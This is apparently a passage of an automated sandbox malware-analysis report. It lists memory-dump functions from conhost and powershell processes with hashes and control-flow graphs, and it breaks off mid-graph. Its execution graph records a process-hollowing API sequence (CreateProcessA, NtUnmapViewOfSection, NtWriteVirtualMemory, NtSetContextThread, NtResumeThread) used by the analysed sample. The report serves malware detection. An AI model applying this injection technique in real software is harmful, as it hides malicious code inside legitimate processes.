                                                                                                    • Instruction Fuzzy Hash: 0F51B526204B81C1EA74DE25EDDC3EA6651F385781FC51065CACA83F9BEE35C405CF48
                                                                                                    Function 000002505E5A0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID: U
                                                                                                    • API String ID: 442123175-4171548499
                                                                                                    • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                    • Instruction ID: 60cdc91ca39c6d1723ff96f646054588680b86657e4b90e8592e8f6f90ed2cce
                                                                                                    • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                    • Instruction Fuzzy Hash: F8418472624A4081EB60DF25ECD83A9A7A0F798796F804135EE8D87754EB3CC541CB44
                                                                                                    Function 000002505E59D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Stringtry_get_function
                                                                                                    • String ID: LCMapStringEx
                                                                                                    • API String ID: 2588686239-3893581201
                                                                                                    • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                                    • Instruction ID: 5e58646f76b550be6f7173e7efbffb222b661bff41cf0bbd5efa8cfe64b4734f
                                                                                                    • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                                    • Instruction Fuzzy Hash: 5A113676208B8086DB60CB56BCC439AB7A0F7C8B81F944126EECD83B19EF38C440CB04
                                                                                                    Function 000002505E5994A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                    • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                    • Instruction ID: 86ec77be2c0063eee55ca52d2e4d2171f1c249b14af68de65e9088c1b53130f6
                                                                                                    • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                    • Instruction Fuzzy Hash: C9114C32208F8082EB618F15EC8439A77A5FB88B99F584265DFCD07B69EF38C551CB04
                                                                                                    Function 000002505E59D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                    • API String ID: 539475747-3084827643
                                                                                                    • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                                    • Instruction ID: cfa7f9b2264384993deef93c8760a8853c5ee5152f176301a73d3297ad226a88
                                                                                                    • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                                    • Instruction Fuzzy Hash: 22F0B461310F8082E6055B81FCC83982321BB88B83F9441A5EA8903B15EE38C454CF08
                                                                                                    Function 000002505E56CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398224271.000002505E560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002505E560000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e560000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: try_get_function
                                                                                                    • String ID: November$October
                                                                                                    • API String ID: 2742660187-1636048786
                                                                                                    • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                                    • Instruction ID: 03d159e3bfbe5a47d93d35aca1fdab1981095d4f3014058bad0b2d5b33f70d02
                                                                                                    • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                                    • Instruction Fuzzy Hash: 6EE09B51201D4192EF05A755FCC83D42311F754781FD95061D59506651EE3CC896CB4C
                                                                                                    Function 000002505E59D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Valuetry_get_function
                                                                                                    • String ID: FlsSetValue
                                                                                                    • API String ID: 738293619-3750699315
                                                                                                    • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                                    • Instruction ID: e13ac5007c78b888bdf94f9fcce412ff5d672ef5b05e898fc732474486133e68
                                                                                                    • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                                    • Instruction Fuzzy Hash: 8CE065A1200E40D2EA054BA0FCC87E86322BB88787FC852B6D58906655EE38C855CF18
                                                                                                    Function 000002505E591D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 756756679-0
                                                                                                    • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                    • Instruction ID: 99abaed175304ab7501e5f1ec329b9ff0bed989b9bba58b9af4666be69fc8be0
                                                                                                    • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                    • Instruction Fuzzy Hash: B3217122604F90C1EA118F69ED8839AF7A0FB84B96F854120DECC87B15FF78C542CB04
                                                                                                    Function 000002505E591274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$AllocProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1617791916-0
                                                                                                    • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                    • Instruction ID: da58d1bcf5f5922f6c24df9051614c299bda72a54daf67e27f58a527d3314a48
                                                                                                    • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                    • Instruction Fuzzy Hash: B3E03971611A00C6E7048B62DC883497AE1FB88B07F888134CA8907750EF7D8499CB40

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:10.8%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:83
                                                                                                    Total number of Limit Nodes:5
                                                                                                    execution_graph 7117 7ffd9bab06c8 7118 7ffd9bab06cd NtResumeThread 7117->7118 7120 7ffd9bab0784 7118->7120 7121 7ffd9baae1e8 7122 7ffd9baae1f1 K32GetModuleInformation 7121->7122 7124 7ffd9baae2b2 7122->7124 7087 7ffd9baae7b6 7088 7ffd9baae7c5 MapViewOfFile 7087->7088 7090 7ffd9baae8a3 7088->7090 7125 7ffd9baae2ec 7126 7ffd9baae2f5 CreateFileA 7125->7126 7128 7ffd9baae4a2 7126->7128 7129 7ffd9baadb69 7130 7ffd9baadb79 7129->7130 7144 7ffd9baaca10 7130->7144 7132 7ffd9baadbd8 7133 7ffd9baaca10 2 API calls 7132->7133 7134 7ffd9baadbf6 7133->7134 7150 7ffd9baaca90 7134->7150 7136 7ffd9baadc01 7155 7ffd9baaca98 7136->7155 7138 7ffd9baadc19 7139 7ffd9baadc91 7138->7139 7160 7ffd9baacbe0 7138->7160 7143 7ffd9baadd6d 7145 7ffd9baadd10 7144->7145 7146 7ffd9baacbe0 K32GetModuleInformation 7145->7146 7147 7ffd9baadd5c 7146->7147 7148 7ffd9baacbf0 K32GetModuleInformation 7147->7148 7149 7ffd9baadd6d 7147->7149 7148->7149 7149->7132 7153 7ffd9baaca41 7150->7153 7151 7ffd9baae419 CreateFileA 7154 7ffd9baae4a2 7151->7154 7152 7ffd9baacab7 7152->7136 7153->7151 7153->7152 7153->7153 7154->7136 7156 7ffd9baaca41 7155->7156 7157 7ffd9baae419 CreateFileA 7156->7157 7158 7ffd9baacab7 7156->7158 7159 7ffd9baae4a2 7157->7159 7158->7138 7159->7138 7162 7ffd9baacbe9 7160->7162 7161 7ffd9baacbee 7162->7161 7163 7ffd9baae26c K32GetModuleInformation 7162->7163 7164 7ffd9baadd5c 7163->7164 7164->7143 7165 7ffd9baacbf0 7164->7165 7166 7ffd9baacbf9 K32GetModuleInformation 7165->7166 7168 7ffd9baae2b2 7166->7168 7168->7143 7091 7ffd9bab04ed 7092 7ffd9bab04fb NtWriteVirtualMemory 7091->7092 7094 7ffd9bab05c7 NtSetContextThread 7092->7094 7096 7ffd9bab069a 7094->7096 7097 7ffd9bab02ce 7098 7ffd9bab02dd NtUnmapViewOfSection 7097->7098 7100 7ffd9bab039a 7098->7100 7101 7ffd9baae54e 7102 7ffd9baae55d CreateFileMappingW 7101->7102 7104 7ffd9baae709 7102->7104 7105 7ffd9baaec6e 7108 7ffd9baaca78 7105->7108 7107 7ffd9baaec89 7111 7ffd9baaca41 7108->7111 7109 7ffd9baae419 CreateFileA 7112 7ffd9baae4a2 7109->7112 7110 7ffd9baacab7 7110->7107 7111->7109 7111->7110 7111->7111 7112->7107 7113 7ffd9baafeb1 7114 7ffd9baafebf CreateProcessA 7113->7114 7116 7ffd9bab01e0 7114->7116 7169 7ffd9baafa62 7171 7ffd9baaf4bd 7169->7171 7170 7ffd9baaf8fa 7171->7170 7185 7ffd9baaf070 7171->7185 7173 7ffd9baaf57e 7174 7ffd9baaf070 CreateProcessA 7173->7174 7175 7ffd9baaf5cd 7174->7175 7176 7ffd9baaf080 CreateProcessA 7175->7176 7177 7ffd9baaf607 7176->7177 7178 7ffd9baaf0c0 NtSetContextThread 7177->7178 7179 7ffd9baaf777 7178->7179 7180 7ffd9baaf86d 7179->7180 7183 7ffd9baaf0c0 NtSetContextThread 7179->7183 7181 7ffd9baaf0c0 NtSetContextThread 7180->7181 7182 7ffd9baaf8ce 7181->7182 7184 7ffd9baaf0e0 NtResumeThread 7182->7184 7183->7179 7184->7170 7186 7ffd9baaf079 CreateProcessA 7185->7186 7188 7ffd9bab01e0 7186->7188

                                                                                                    Executed Functions

                                                                                                    Function 00007FFD9BAB04ED Relevance: 3.2, APIs: 2, Instructions: 235nativethreadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 140 7ffd9bab04ed-7ffd9bab04f9 141 7ffd9bab04fb-7ffd9bab0503 140->141 142 7ffd9bab0504-7ffd9bab0578 140->142 141->142 146 7ffd9bab057a-7ffd9bab057f 142->146 147 7ffd9bab0582-7ffd9bab05c5 NtWriteVirtualMemory 142->147 146->147 148 7ffd9bab05c7 147->148 149 7ffd9bab05cd-7ffd9bab0698 NtSetContextThread 147->149 148->149 154 7ffd9bab069a 149->154 155 7ffd9bab06a0-7ffd9bab06c3 149->155 154->155
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextMemoryThreadVirtualWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 4272518735-0
                                                                                                    • Opcode ID: 5005c973fa87d2aa5bb3a9865e90252bd8b1db2bb85f59c3b273eeb8d43405c8
                                                                                                    • Instruction ID: a5897541c3c0ce82e7ad9a16c5265043e0974470570ce866dddd9b491a6a3309
                                                                                                    • Opcode Fuzzy Hash: 5005c973fa87d2aa5bb3a9865e90252bd8b1db2bb85f59c3b273eeb8d43405c8
                                                                                                    • Instruction Fuzzy Hash: BC71F63190DB8C8FDB69DF689845AE9BBF0EF56321F0442AFD049D7592CB74A805CB81
                                                                                                    Function 00007FFD9BAAF0E0 Relevance: 2.7, APIs: 1, Instructions: 1174nativethreadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 245 7ffd9baaf0e0-7ffd9bab0782 NtResumeThread 250 7ffd9bab078a-7ffd9bab07ad 245->250 251 7ffd9bab0784 245->251 252 7ffd9bab07bb-7ffd9bab07bd 250->252 253 7ffd9bab07af-7ffd9bab07b3 250->253 251->250 255 7ffd9bab07be-7ffd9bab082a 252->255 253->255 256 7ffd9bab07b5-7ffd9bab07b8 253->256 256->252
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: b88166120057fab4d1b3ba44efe0261141f5ba230410f2a30d9d8ea473446d0e
                                                                                                    • Instruction ID: 97645d1e7dae0423daad4921e83b69377ca225055a2b5fd09ddc42dae521dd6a
                                                                                                    • Opcode Fuzzy Hash: b88166120057fab4d1b3ba44efe0261141f5ba230410f2a30d9d8ea473446d0e
                                                                                                    • Instruction Fuzzy Hash: 7E515C3190E7D84FE762CBA888656A9BFF0EF56710F0941FFC098C71A3CA646805CB91
                                                                                                    Function 00007FFD9BAB06C8 Relevance: 2.6, APIs: 1, Instructions: 1139nativethreadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 260 7ffd9bab06c8-7ffd9bab06cb 261 7ffd9bab06d6-7ffd9bab0782 NtResumeThread 260->261 262 7ffd9bab06cd-7ffd9bab06d5 260->262 266 7ffd9bab078a-7ffd9bab07ad 261->266 267 7ffd9bab0784 261->267 262->261 268 7ffd9bab07bb-7ffd9bab07bd 266->268 269 7ffd9bab07af-7ffd9bab07b3 266->269 267->266 271 7ffd9bab07be-7ffd9bab082a 268->271 269->271 272 7ffd9bab07b5-7ffd9bab07b8 269->272 272->268
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 310769844fc1e3bb510c78c1b3f2ccaac12e36ce899e722acd4cf09e5c6a4bfb
                                                                                                    • Instruction ID: 8834f0bfc5e4b19c7e93ed07786d13cc741c3fc37aa3e4113a9b2ccbb3dce71d
                                                                                                    • Opcode Fuzzy Hash: 310769844fc1e3bb510c78c1b3f2ccaac12e36ce899e722acd4cf09e5c6a4bfb
                                                                                                    • Instruction Fuzzy Hash: 9041283190E7C84FDB66DB688C556A9BFF0EF57310F0901EBD098C71A3DAA45846CB92
                                                                                                    Function 00007FFD9BAB02CE Relevance: 1.6, APIs: 1, Instructions: 120nativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 653 7ffd9bab02ce-7ffd9bab02db 654 7ffd9bab02e6-7ffd9bab0398 NtUnmapViewOfSection 653->654 655 7ffd9bab02dd-7ffd9bab02e5 653->655 659 7ffd9bab039a 654->659 660 7ffd9bab03a0-7ffd9bab03c3 654->660 655->654 659->660
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SectionUnmapView
                                                                                                    • String ID:
                                                                                                    • API String ID: 498011366-0
                                                                                                    • Opcode ID: 9df4ea66f362c84e0b387fb74a27f4bf397b08dc06590d1b84a69ab2ab032c6d
                                                                                                    • Instruction ID: 973fea46533e4789d24be212185b16ebf8beb4ce81acce91118197083454af38
                                                                                                    • Opcode Fuzzy Hash: 9df4ea66f362c84e0b387fb74a27f4bf397b08dc06590d1b84a69ab2ab032c6d
                                                                                                    • Instruction Fuzzy Hash: EE41E63190E7888FDB56DB688C557E97FB0EF67320F08429BC048C71A7C665A445CB92
                                                                                                    Function 00007FFD9BAAF0C0 Relevance: 1.6, APIs: 1, Instructions: 106nativethreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1591575202-0
                                                                                                    • Opcode ID: 6405c46a7247431cf91dc6e5a9c1e097142454aecedf59c60f45ff47f29df31c
                                                                                                    • Instruction ID: 6f5aee3516f1291eff4f0098e4a24b413f137fb86a05ef412037a15bffa7a8ad
                                                                                                    • Opcode Fuzzy Hash: 6405c46a7247431cf91dc6e5a9c1e097142454aecedf59c60f45ff47f29df31c
                                                                                                    • Instruction Fuzzy Hash: 5B310831A0D64C8FDB58DF68C8557E9BBF0EB6A321F04416FD049C7162D674A846CB51
                                                                                                    Function 00007FFD9BAAC93F Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 537COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 7ffd9baac93f-7ffd9baac941 1 7ffd9baac9be-7ffd9baac9ed 0->1 2 7ffd9baac943-7ffd9baac956 0->2 8 7ffd9baac9ef-7ffd9baac9fd 1->8 9 7ffd9baaca3d-7ffd9baaca49 1->9 2->1 14 7ffd9baaca4d-7ffd9baaca5c 8->14 16 7ffd9baac9ff-7ffd9baaca07 8->16 11 7ffd9baacac5-7ffd9baacb04 9->11 12 7ffd9baaca4b-7ffd9baaca4c 9->12 27 7ffd9baacb05 11->27 12->14 22 7ffd9baaca5d-7ffd9baacaa0 14->22 18 7ffd9baaca08 16->18 19 7ffd9baaca09-7ffd9baaca0c 16->19 18->19 19->22 23 7ffd9baaca0d 19->23 48 7ffd9baaca41 22->48 49 7ffd9baacaa2-7ffd9baacab5 22->49 23->22 25 7ffd9baaca0f-7ffd9baadd62 call 7ffd9baacab8 call 7ffd9baacbe0 23->25 57 7ffd9baadd68-7ffd9baadd84 call 7ffd9baacbf0 call 7ffd9baacc00 25->57 58 7ffd9baadf53-7ffd9baadfa7 25->58 30 7ffd9baacb07-7ffd9baacb54 27->30 31 7ffd9baacb55 27->31 30->31 35 7ffd9baacba5-7ffd9baacbb4 31->35 36 7ffd9baacb56-7ffd9baacb65 31->36 41 7ffd9baacbb5-7ffd9baacbc9 35->41 40 7ffd9baacb67-7ffd9baacb77 36->40 36->41 40->35 60 7ffd9baacbcc-7ffd9baacbd1 41->60 61 7ffd9baacc1a-7ffd9baacc1b 41->61 52 7ffd9baacabd-7ffd9baacabe 48->52 53 7ffd9baaca43-7ffd9baaca49 48->53 49->27 59 7ffd9baacab7 49->59 52->11 53->11 53->12 77 7ffd9baadf4a-7ffd9baadf52 call 7ffd9baacc70 57->77 78 7ffd9baadd8a-7ffd9baaddc5 call 7ffd9baacc10 57->78 64 7ffd9baadfa9-7ffd9baadfb1 58->64 65 7ffd9baadfb2-7ffd9baadffe 58->65 66 7ffd9baacc4b-7ffd9baae990 60->66 61->66 67 7ffd9baae310-7ffd9baae394 61->67 64->65 92 7ffd9baae998-7ffd9baae9b5 66->92 93 7ffd9baae992 66->93 79 7ffd9baae408-7ffd9baae4a0 CreateFileA 67->79 80 7ffd9baae396-7ffd9baae3be 67->80 77->58 78->77 98 7ffd9baaddcb-7ffd9baaddf1 call 7ffd9baacc20 78->98 87 7ffd9baae4a8-7ffd9baae4e4 call 7ffd9baae500 79->87 88 7ffd9baae4a2 79->88 80->79 91 7ffd9baae3c0-7ffd9baae3c3 80->91 106 7ffd9baae4e6 87->106 107 7ffd9baae4eb-7ffd9baae4ff 87->107 88->87 95 7ffd9baae3c5-7ffd9baae3d8 91->95 96 7ffd9baae3fd-7ffd9baae405 91->96 93->92 99 7ffd9baae3dc-7ffd9baae3ef 95->99 100 7ffd9baae3da 95->100 96->79 108 7ffd9baaddf7-7ffd9baade17 call 7ffd9baacc30 98->108 109 7ffd9baadf42-7ffd9baadf45 call 7ffd9baacc60 98->109 99->99 103 7ffd9baae3f1-7ffd9baae3f9 99->103 100->99 103->96 106->107 113 7ffd9baadf3a-7ffd9baadf3d call 7ffd9baacc60 108->113 114 7ffd9baade1d-7ffd9baade5b 108->114 109->77 113->109 114->113 119 7ffd9baade61-7ffd9baade65 114->119 120 7ffd9baade68-7ffd9baade85 119->120 122 7ffd9baadec7-7ffd9baaded8 120->122 123 7ffd9baade87-7ffd9baade95 120->123 122->120 124 7ffd9baadeda 122->124 123->122 126 7ffd9baade97-7ffd9baadea5 123->126 124->113 126->122 128 7ffd9baadea7-7ffd9baadeb5 126->128 128->122 130 7ffd9baadeb7-7ffd9baadec5 128->130 130->122 132 7ffd9baadedc-7ffd9baadf32 call 7ffd9baacc40 call 7ffd9baacc50 130->132 132->113 139 7ffd9baadf35 call 7ffd9baacc40 132->139 139->113
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: xN_I
                                                                                                    • API String ID: 0-3353890570
                                                                                                    • Opcode ID: 5332f7d60dcedcaa1df6992e322444db134944592c1970d3bac03cc653020632
                                                                                                    • Instruction ID: ee8633f5133e64b80fb5bdb8e1eba404cee6dd7ec55ae339fae8860064788ac5
                                                                                                    • Opcode Fuzzy Hash: 5332f7d60dcedcaa1df6992e322444db134944592c1970d3bac03cc653020632
                                                                                                    • Instruction Fuzzy Hash: C8F14732A0DA4C4FE728DB5CAC552E87BD1FF94321F14027FE44DC71A3EA69A9428791
                                                                                                    Function 00007FFD9BB718FC Relevance: 1.9, Instructions: 1884COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 276 7ffd9bb718fc-7ffd9bb71911 277 7ffd9bb71913-7ffd9bb71953 276->277 278 7ffd9bb71955-7ffd9bb719c9 276->278 277->278 283 7ffd9bb719cd-7ffd9bb71a27 278->283 286 7ffd9bb71a2d-7ffd9bb71a3a 283->286 287 7ffd9bb72756-7ffd9bb727e6 283->287 288 7ffd9bb71a3c-7ffd9bb71a4f 286->288 289 7ffd9bb71a56-7ffd9bb71acb 286->289 296 7ffd9bb727ec-7ffd9bb727f6 287->296 297 7ffd9bb728e8-7ffd9bb72974 287->297 288->289 289->287 305 7ffd9bb71ad1-7ffd9bb71ade 289->305 298 7ffd9bb7280f-7ffd9bb7283e 296->298 299 7ffd9bb727f8-7ffd9bb7280d 296->299 311 7ffd9bb72a11-7ffd9bb72a1b 297->311 312 7ffd9bb7297a-7ffd9bb72990 297->312 298->297 310 7ffd9bb72844-7ffd9bb7284e 298->310 299->298 308 7ffd9bb71ae0-7ffd9bb71af3 305->308 309 7ffd9bb71afa-7ffd9bb71b6f 305->309 308->309 309->287 334 7ffd9bb71b75-7ffd9bb71b82 309->334 314 7ffd9bb72850-7ffd9bb7285d 310->314 315 7ffd9bb72867-7ffd9bb72868 310->315 318 7ffd9bb72a1d-7ffd9bb72a27 311->318 319 7ffd9bb72a28-7ffd9bb72a6a 311->319 312->311 314->315 325 7ffd9bb7285f-7ffd9bb72865 314->325 316 7ffd9bb7286d-7ffd9bb72875 315->316 326 7ffd9bb72877-7ffd9bb728c7 316->326 325->315 343 7ffd9bb728db-7ffd9bb728e7 326->343 344 7ffd9bb728c9-7ffd9bb728da 326->344 336 7ffd9bb71b84-7ffd9bb71b97 334->336 337 7ffd9bb71b9e-7ffd9bb71c6e 334->337 336->337 337->287 349 7ffd9bb71c74-7ffd9bb71c81 337->349 344->343 350 7ffd9bb71c83-7ffd9bb71c96 349->350 351 7ffd9bb71c9d-7ffd9bb71e7e 349->351 350->351 351->287 364 7ffd9bb71e84-7ffd9bb71e91 351->364 365 7ffd9bb71e93-7ffd9bb71ea6 364->365 366 7ffd9bb71ead-7ffd9bb71f7d 364->366 365->366 366->287 373 7ffd9bb71f83-7ffd9bb71f90 366->373 374 7ffd9bb71f92-7ffd9bb71fa5 373->374 375 7ffd9bb71fac-7ffd9bb72021 373->375 374->375 375->287 380 7ffd9bb72027-7ffd9bb72034 375->380 381 7ffd9bb72050-7ffd9bb720c5 380->381 382 7ffd9bb72036-7ffd9bb72049 380->382 381->287 387 7ffd9bb720cb-7ffd9bb720d8 381->387 382->381 388 7ffd9bb720f4-7ffd9bb72166 387->388 389 7ffd9bb720da-7ffd9bb720ed 387->389 388->287 394 7ffd9bb7216c-7ffd9bb72179 388->394 389->388 395 7ffd9bb7217b-7ffd9bb7218e 394->395 396 7ffd9bb72195-7ffd9bb72205 394->396 395->396 396->287 401 7ffd9bb7220b-7ffd9bb72218 396->401 402 7ffd9bb72234-7ffd9bb722a4 401->402 403 7ffd9bb7221a-7ffd9bb7222d 401->403 402->287 408 7ffd9bb722aa-7ffd9bb722b7 402->408 403->402 409 7ffd9bb722d3-7ffd9bb72343 408->409 410 7ffd9bb722b9-7ffd9bb722cc 408->410 409->287 415 7ffd9bb72349-7ffd9bb72356 409->415 410->409 416 7ffd9bb72372-7ffd9bb72433 415->416 417 7ffd9bb72358-7ffd9bb7236b 415->417 416->287 424 7ffd9bb72439-7ffd9bb72446 416->424 417->416 425 7ffd9bb72462-7ffd9bb724d4 424->425 426 7ffd9bb72448-7ffd9bb7245b 424->426 425->287 431 